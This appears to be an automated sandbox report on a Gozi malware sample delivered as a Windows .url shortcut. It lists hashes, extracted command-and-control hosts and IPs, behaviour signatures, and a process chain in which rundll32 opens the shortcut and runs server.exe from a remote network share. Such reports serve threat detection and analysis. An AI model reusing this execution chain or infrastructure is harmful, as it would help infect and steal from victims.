Analysis
max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-03-2023 08:16

Static task: static1
Behavioral task: behavioral1
Sample: Agenzia/Agenzia.url
Resource: win7-20230220-en (windows7-x64)
1 signatures, 150 seconds
General
Target: Agenzia/Agenzia.url
Size: 189B
MD5: 0c3f7c2aa0311bf8c761b9b4e8b33d45
SHA1: 4eaa085327b0cd857d43aacffdbc7963a67523d2
SHA256: 025f536aab4e91765785e1d0897b55674f217b871e2afe0dba10ad1c5a9f1417
SHA512: 710eeb07fbab0b978064220d3ed36bd7de04987f7e3f9a75a1920dd793847606a205d9205b4745edb59e65e3433ef84e7e98c8213017d24e2379533ffd0962b2
Malware Config
Extracted
Family: gozi

Extracted
Family: gozi
Botnet: 7716
C2:
  checklist.skype.com
  193.233.175.115
  185.68.93.20
  62.173.140.250
  46.8.210.133
Attributes:
  base_path: /drew/
  build: 250255
  exe_type: loader
  extension: .jlk
  server_id: 50
  rsa_pubkey.plain
  aes.plain
Signatures
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: rundll32.exe
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation
  process: rundll32.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious use of WriteProcessMemory (3 IoCs)
Processes: rundll32.exe
  description: PID 1416 wrote to memory of 800; pid: 1416; process: rundll32.exe; target process: server.exe
  description: PID 1416 wrote to memory of 800; pid: 1416; process: rundll32.exe; target process: server.exe
  description: PID 1416 wrote to memory of 800; pid: 1416; process: rundll32.exe; target process: server.exe
Processes
Process 1: C:\Windows\System32\rundll32.exe
  Command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia\Agenzia.url
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

Process 2 (child of process 1): \??\UNC\46.8.210.86\Agenzia\server.exe
  Command line: "\\46.8.210.86\Agenzia\server.exe"